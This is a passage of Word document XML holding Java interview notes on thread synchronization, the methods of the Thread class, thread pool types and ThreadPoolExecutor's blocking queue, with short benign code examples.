      </w:r>
    </w:p>
    <w:p w14:paraId="7DFEB9A3" w14:textId="77777777" w:rsidR="00090DFF" w:rsidRPr="00535C96" w:rsidRDefault="00090DFF" w:rsidP="00535C96">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30248C0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addData(String key, Integer value) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051C3B3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map.put(key, value);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271864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DD7530F" w14:textId="77777777" w:rsidR="00090DFF" w:rsidRPr="00535C96" w:rsidRDefault="00090DFF" w:rsidP="00535C96">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="789A69B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eger getData(String key) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D6C10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map.get(key);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B8669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48446D0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041836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ConcurrentHashMap allows concurrent read and write operations with thread-safe mechanisms internally, making it a preferred choice over HashMap when working with multiple threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDEA8F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Key Concepts in Thread Synchronization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C055C42"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onitor (Intrinsic Lock):</w:t>
      </w:r>
      <w:r w:rsidRPr="00535C96">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Every object in Java has an implicit lock or monitor. Only one thread can hold the lock at a time for a synchronized method or block.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B116DC"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Deadlock:</w:t>
      </w:r>
      <w:r w:rsidRPr="00535C96">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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tarvation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00535C96">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Occurs when a thread is unable to gain regular access to the resources it needs because other threads are always being given preference.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2608A2"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Best Practices for Thread Synchronization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17261163"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inimize the scope of synchronization:</w:t>
      </w:r>
      <w:r w:rsidRPr="00535C96">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Keep the synchronized block as small as possible to minimize the performance overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A75B0F9"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Use high-level concurrency utilities:</w:t>
      </w:r>
      <w:r w:rsidRPr="00535C96">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prefer using high-level synchronization tools like ExecutorService, ReentrantLock, Semaphore, or concurrent collections instead of low-level synchronization with synchronized.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0013082B"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Avoid deadlock:</w:t>
      </w:r>
      <w:r w:rsidRPr="00535C96">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ensure that threads acquire locks in a consistent order to prevent circular dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752D0693"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Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6235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2" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE9B7D6"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8" w:name="_Toc197867502"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are the methods of thread?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="288"/>
    </w:p>
    <w:p w14:paraId="2281F5E1" w14:textId="71A0A644" w:rsidR="00D902FD" w:rsidRPr="00535C96" w:rsidRDefault="00D902FD"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Here are the commonly used methods of the Thread class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FD31C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tart()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6BD957"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Starts the execution of a thread. It invokes the run() method in a new thread of execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7DB8F8"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1B2DDE2F"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tart()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B16D9E"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you call start(), the thread enters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 and the run() method is invoked by the Java runtime. The run() method contains the code that will be executed by the thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C7173F"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ED3A55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  // Starts the thread execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687B42E3"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run()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC1EC75"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is method contains the code to be executed by the thread. You need to override this method when creating a custom thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39993738"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E83CB4"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run()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796DABAA"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run() method is called when the thread is started using the start() method. It contains the logic of what the thread will do when executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5F96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MyThread extends Thread {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1122CB0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Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED471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run() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371291FE"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stem.out.println("Thread is running.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E777F2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9552E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3E93EA2" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="00535C96" w:rsidRDefault="00D902FD" w:rsidP="00535C96">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6614964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MyThread t = new MyThread();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED6224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37EE84C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sleep(long millis)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546928A7"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ly executing thread to sleep for the specified amount of time (in milliseconds).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61495E6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6B7065B"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sleep(long millis) throws InterruptedException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467BBDB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sleep() method pauses the execution of the current thread for the specified amount of time. After the sleep time expires, the thread moves back to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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14298A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18BD5C0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hread.sleep(1000);  // Sleep for 1 second</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337FE4F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C80881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9F1AD7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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4797FF7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yield()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D30B7F9"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A thread suggests that the current thread is willing to yield its current use of the CPU and allow other threads of the same priority to run.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410E9E54"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8DCD24E" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="00535C96" w:rsidRDefault="00D902FD" w:rsidP="00535C96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1168"/>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yield()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7CF9B6"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535C96" w:rsidRDefault="00D902FD" w:rsidP="00535C96">
      <w:pPr>
        <w:ind w:left="360" w:firstLine="36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yield();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DC9881"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5. interrupt()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D35DF0"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Interrupts the thread. If the thread is sleeping, waiting, or doing something that can be interrupted, the interrupt flag is set, and the thread will throw an InterruptedException.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C78832"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C0AEFF"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interrupt()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C063565"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919A5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7F27DC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interrupt();  // Interrupts the thread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCF1E2C"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6. isAlive()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C53549"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hecks if the thread is currently alive (i.e., has been started and has not yet finished execution).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2899E6F2"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333D98F3"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boolean isAlive()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2168BF"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Returns true if the thread is alive (i.e., the thread has been started and is still running or in the runnable state). Returns false if the thread is dead (i.e., it has finished execution).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BC4E0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40939A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70F5ABD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isAlive());  // Returns true if thread is alive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCE075D"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7. join()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49FD2D5D"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 thread to wait until the thread on which join() is called has finished executing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C21391"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00755FCC" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="00535C96" w:rsidRDefault="00D902FD" w:rsidP="00535C96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1171"/>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join() throws InterruptedException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E8B87A"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A77E5A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44B2370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03F6991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join();  // Main thread will wait for 't' to finish</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265C812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5D418B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4C563B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38E927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8. getName() and setName(String name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F966B67"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ese methods get and set the name of the thread, respectively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A3056A"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11399C9"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ring getName()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FF8B88"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Name(String name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2198E69B"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getName() method returns the name of the thread, and setName() allows you to set a custom name for the thread. Thread names can be useful for debugging and logging purposes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D388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B180A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Name("MyThread");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5456F8C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Output: MyThread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279226C9"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9. getId()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE6AD9C"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the unique identifier for the thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289F032E"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Syntax:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7749B674" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="00535C96" w:rsidRDefault="00D902FD" w:rsidP="00535C96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1173"/>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long getId()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E96990"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Every thread in Java has a unique ID that can be retrieved using getId().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5283A90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1FF86B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Id());  // Prints the thread ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1830A99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0. getPriority() and setPriority(int priority)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE60E92"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Gets and sets the priority of a thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC9CA49"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16224CA"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int getPriority()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2A4429"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Priority(int priority)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2985862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D5E918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Priority(Thread.MAX_PRIORITY);  // Set thread priority to maximum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100230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Priority());  // Prints the thread priority</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1064A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1. currentThread()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F1740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a reference to the currently executing thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FC9D2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7D251FE7"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Thread currentThread()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1445D91B"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useful when you want to get the current thread object from within a running thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A6A1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Thread.currentThread();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5198EEE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Prints the name of the current thread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7312538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2. setDaemon(boolean on)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211A8D87"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Marks the thread as a daemon thread or a user thread. Daemon threads are automatically terminated when all user threads finish.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B42BB8"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24FDE3BF"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Daemon(boolean on)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B16EF2D"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daemon thread is a background thread that performs tasks such as garbage collection or monitoring. It is terminated automatically when all non-daemon (user) threads terminate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E2748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7F9E31F1"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Daemon(true);  // Set the thread as daemon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EED9F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02CDCD4" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="00535C96" w:rsidRDefault="00000000" w:rsidP="00535C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D06A11">
          <v:rect id="_x0000_i1843" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="642093D8"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Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D4B5B6"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4" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E4827C"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9" w:name="_Toc197867503"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is thread pool? What are the types of thread pool?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="289"/>
    </w:p>
    <w:p w14:paraId="16248A96" w14:textId="16C2BE00" w:rsidR="00D902FD" w:rsidRPr="006B0982" w:rsidRDefault="00D902FD" w:rsidP="006B0982">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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A </w:t>
      </w:r>
      <w:r w:rsidRPr="006B0982">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Thread Pool</w:t>
      </w:r>
      <w:r w:rsidRPr="006B0982">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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Advantages of Using a Thread Pool:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541BE9E2"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fficiency:</w:t>
      </w:r>
      <w:r w:rsidRPr="006B0982">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Reusing threads reduces the overhead of thread creation and destruction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE85945"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Resource Management:</w:t>
      </w:r>
      <w:r w:rsidRPr="006B0982">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> It allows the system to limit the number of threads, preventing the system from creating too many threads, which could consume excessive resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B5818F"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Task Queuing:</w:t>
      </w:r>
      <w:r w:rsidRPr="006B0982">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tasks are queued until there is an available thread to process them, providing a controlled execution environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F382E73"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Improved Performance:</w:t>
      </w:r>
      <w:r w:rsidRPr="006B0982">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Reusing threads rather than creating new ones reduces the overhead and leads to faster task execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295AFA6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Types of Thread Pools in Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2243ED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In Java, thread pools can be created using the ExecutorService framework. The Executors class provides factory methods for creating different types of thread pools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F90D93"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1. Fixed Thread Pool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478A8E1A"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a fixed number of threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297A6326"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number of threads is fixed, and if all threads are busy, new tasks will be queued until a thread becomes available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573A6B44"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Suitable when you have a known number of tasks that will run concurrently and you want to limit the number of threads executing at a time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7731E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182E38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FixedThreadPool(4);  // 4 threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255FF1A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CC5BF2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942F2D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AFA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5B16C73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13E6A1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1DF5D2A"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2. Cached Thread Pool (Dynamic Thread Pool)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4105DA17"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dynamically grow and shrink based on the number of tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188C8949"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applications where the number of tasks varies significantly over time, and you don't want to limit the number of threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3751C3F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6D7209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CachedThreadPool();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1609F62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7342F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480D11F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3877EE2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BF72BF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045DD974"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F6BF868"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3. Single Thread Pool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C256947"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only one thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124484D0"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Only one thread is used to execute the tasks sequentially, meaning tasks are executed one after another.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A7E5FE"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when you want to ensure tasks are executed in a specific order (i.e., one at a time), such as for logging or other sequential tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692F379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3744810"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SingleThreadExecutor();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFD6E1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4B75783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491CC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2AB4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C5278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22F5C84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4A12389E"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4. Scheduled Thread Pool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3812EEE6"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schedule tasks to execute after a fixed delay or periodically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4963BDCD"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tasks are executed at scheduled intervals or after a certain delay.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12754FEC"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for periodic tasks such as scheduled maintenance, monitoring, or any task that needs to be executed repeatedly at fixed intervals.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3987BA2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26FDEE9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dExecutorService scheduler = Executors.newScheduledThreadPool(2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B80B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r.scheduleAtFixedRate(() -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DAE457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to run periodically</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AC7D7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0, 5, TimeUnit.SECONDS);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0156FD47"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5. ForkJoinPool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013F50C2"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A special thread pool designed for parallelizing divide-and-conquer tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7509CC49"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parallel computing tasks that involve recursive processing (e.g., recursive algorithms, parallel algorithms).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CC76B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08F4151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ForkJoinPool pool = new ForkJoinPool();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D8EF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pool.submit(() -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B799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Recursive task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AD9CB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5661003A" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="006B0982" w:rsidRDefault="00000000" w:rsidP="006B098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D4F84">
          <v:rect id="_x0000_i1845" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6252875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Choosing the Right Thread Pool:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131DE487"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ixed Thread Pool</w:t>
      </w:r>
      <w:r w:rsidRPr="006B0982">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is ideal for a fixed number of concurrent tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD4C80F"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Cached Thread Pool</w:t>
      </w:r>
      <w:r w:rsidRPr="006B0982">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is suitable for handling an unknown number of tasks with potentially high variation in task size.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0BF06C"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ingle Thread Pool</w:t>
      </w:r>
      <w:r w:rsidRPr="006B0982">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is used when tasks must execute in a sequential manner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07131436"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cheduled Thread Pool</w:t>
      </w:r>
      <w:r w:rsidRPr="006B0982">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is appropriate when tasks need to run periodically or after delays.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FB1F35"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orkJoinPool</w:t>
      </w:r>
      <w:r w:rsidRPr="006B0982">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is best for parallelizing tasks that can be recursively broken down.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E8E1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Using the right thread pool can help manage resources more effectively, avoid thread over-provisioning, and optimize task execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDC3F73" w14:textId="5DC2BE9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6" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E9126B" w14:textId="44785B89" w:rsidR="00BB1B21" w:rsidRPr="00CE4B95" w:rsidRDefault="00BB1B21" w:rsidP="00BB1B21">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="290" w:name="_Toc197867504"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>In Thread Pool Executor which data structure is used to store the request data?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="290"/>
    </w:p>
    <w:p w14:paraId="508AFE15" w14:textId="222A294C" w:rsidR="00CA708F" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA708F" w:rsidP="008D0F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the data structure used to store the tasks (requests) that need to be executed is typically a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>blocking queue</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Specifically, 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used to hold the tasks before they are picked up by available threads for execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1439D6AB" w14:textId="77777777" w:rsidR="001E0230" w:rsidRPr="00CE4B95" w:rsidRDefault="001E0230" w:rsidP="001E0230">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F424C0F"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Data Structures for BlockingQueue:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6CD2E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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E3169F"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most commonly used implementation of a BlockingQueue in ThreadPoolExecutor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE7A88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an optional capacity limit, meaning it can grow dynamically (if the capacity is not specified) or be bounded with a fixed capacity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3929E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upports efficient thread-safe operations and allows multiple threads to enqueue and dequeue tasks safely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720A054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and threads are available, the tasks will be added to the queue, and threads will continue to execute the tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA24D28" w14:textId="25D31209"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0D58DD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w:t>
      </w:r>
